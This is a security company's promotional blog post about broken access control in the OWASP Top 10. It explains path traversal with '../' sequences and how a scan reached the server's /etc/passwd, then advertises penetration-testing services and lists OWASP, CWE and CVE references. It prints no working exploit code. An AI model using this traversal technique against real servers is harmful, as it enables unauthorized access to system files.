OWASP Top 5 -Broken Access Control

owasp top 5

OWASP Top 5 – Broken Access Control is ranked as the vulnerability number five on the OWASP Top 10 list. Access controls or authorization systems are about how a web application grants access to content and functions to some users and not to others.

Many of these access schemes were not deliberately designed, but simply evolved alongside the website. In these cases, the access control rules are inserted in various locations throughout the code and in the file folders. As the website approaches implementation, the set of rules becomes so unwieldy that it is almost impossible to understand.

Many of these flawed access control schemes are not difficult to discover and exploit. Once a flaw is discovered, the consequences of a faulty access control scheme can be devastating. In addition to viewing unauthorized content, an attacker could change or delete content, perform unauthorized functions, or even take over the administration of the site, with all that implies the loss of the reputation of the affected company.

Let’s examine an example of a breached access control. To understand this demonstration, we must know that websites reside as files in folders with certain permissions assigned within an operating system. When these folders are configured with the wrong set of permissions, they can be compromised by attackers accessing the configuration files of the webpage, which may have written confidential data as passwords or any confidential information.

OWASP Top 5 – Anatomy of a Website Attack

It is possible for an experienced attacker to do a detailed analysis of the possible vulnerabilities of a web page, long before even thinking about attacking the target. In this case, the attacker, in his enumeration process, may find different vulnerabilities as a vulnerability called “Path Traversal Attack”.

This small report shows us the name of the vulnerability, the link to the Web page that is vulnerable, the risk of being attacked, which in this case is high, and the evidence that the analysis tool was already able to confirm the vulnerability as exploitable showing us part of the document that you accessed, in this case “root:x:0:0”:

A path traversal attack (also known as a directory traversal) aims to access files and directories that are stored outside of the web root folder. By manipulating variables that refer to files with “dot-dot-slash (../)” sequences and their variations or by using absolute file paths, it is possible to access arbitrary files and directories stored in the file system, including source code or application settings and critical files in the system. It should be noted that access to files is limited by the access control of the system, that is, by the permissions assigned to folders and files.

If we follow the same path that the analysis tool shows us using any web browser, we have access to the file “/etc/passwd” that resides on the server.

Other more specialized analysis tools can take advantage of this vulnerability to even abuse it more and provide us with a direct remote connection to this vulnerable server.

It is important to mention that the results of the scans and unauthorized access to these files and folders are possible because someone did not set the file permissions properly. The same situation can occur on your corporate website.

How can I determine if I am vulnerable to these types of attacks?

To answer this question, it is necessary to do an analysis of the access control policy that your technology department should have documented. Is there a policy in your company that guides your website administrators in creating new users and assigning permissions to system files? If this policy for assigning permissions does not exist, it is very likely that your web applications are affected, it would allow the extraction of information from your servers or have access to data that the some user should not access.

If a defined permission assignment policy does not exist in relation to creating new users or assigning permissions to files and folders, your website is most likely vulnerable.

How can RedDefense Global help me to keep my corporate website safe?

RedDefense Global will put your corporate websites and databases to the test. We use advanced scanners, manual penetration testing, and different techniques and procedures that may include crawling, rough tampering, code review, and folder permissions. We do all of this in coordination with your internal staff in charge of your information systems. These procedures are necessary to find out if the potential vulnerabilities are false positives or real vulnerabilities. If they are real vulnerabilities, we will provide you with effective methods to patch, update or remove the vulnerability according to the situation to keep your environment safe.

SOLUTION AND PREVENTION

https://www.reddefenseglobal.com/services

Additional resources regarding this type of attack:

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A5-Broken_Access_Control.html

https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_Sheet.html

https://cwe.mitre.org/data/definitions/22.html

https://cwe.mitre.org/data/definitions/284.html

https://cwe.mitre.org/data/definitions/285.html

https://cwe.mitre.org/data/definitions/639.html

Some applications with this type of vulnerabilities cataloged by CVE:

CVE-2019-13405

CVE-2018-18392

CVE-2019-16919